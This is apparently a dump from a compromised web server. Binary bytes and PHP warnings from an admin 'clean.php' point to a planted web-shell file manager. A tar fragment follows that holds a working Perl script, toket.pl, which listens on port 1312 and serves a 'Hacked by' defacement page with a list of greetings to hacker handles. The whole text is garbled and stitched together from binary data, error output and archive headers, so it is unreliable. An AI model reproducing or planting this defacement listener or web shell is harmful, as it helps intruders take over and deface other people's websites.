����C�  
Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/html/admin/productimages/clean.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/admin/productimages/clean.php:1) in /var/www/html/admin/productimages/clean.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/admin/productimages/clean.php:1) in /var/www/html/admin/productimages/clean.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/admin/productimages/clean.php:1) in /var/www/html/admin/productimages/clean.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/admin/productimages/clean.php:1) in /var/www/html/admin/productimages/clean.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/admin/productimages/clean.php:1) in /var/www/html/admin/productimages/clean.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/admin/productimages/clean.php:1) in /var/www/html/admin/productimages/clean.php on line 4
var/www/html/admin/productimages/102/toket.pl000064400000001440150632142400015043 0ustar00#!/usr/bin/perl -w use strict; use IO::Socket; sub Wait { wait; # wait needed to keep pids from building up } $SIG{CHLD} = \&Wait; my $server = IO::Socket::INET->new( LocalPort => 1312, # set port Type => SOCK_STREAM, Reuse => 1, Listen => 10) or die "$@\n"; my $client ; while($client = $server->accept()) { select $client; print $client "HTTP/1.0 200 OK\r\n"; print $client "Content-type: text/html\r\n\r\n"; print $client "Hacked

Hacked by L4663r666h05t

Greetz: Jundab - Wonka - Dijehaji - Simsimi - PYS404 - Mr.Vendetta_404 - son1x - civilian
./Coco - Fellgans - Mr.Donut's - scut - ceyen - anon - cyberbug - r3dshadow

"; # set your html content } continue { close($client); #kills hangs kill CHLD => -$$; }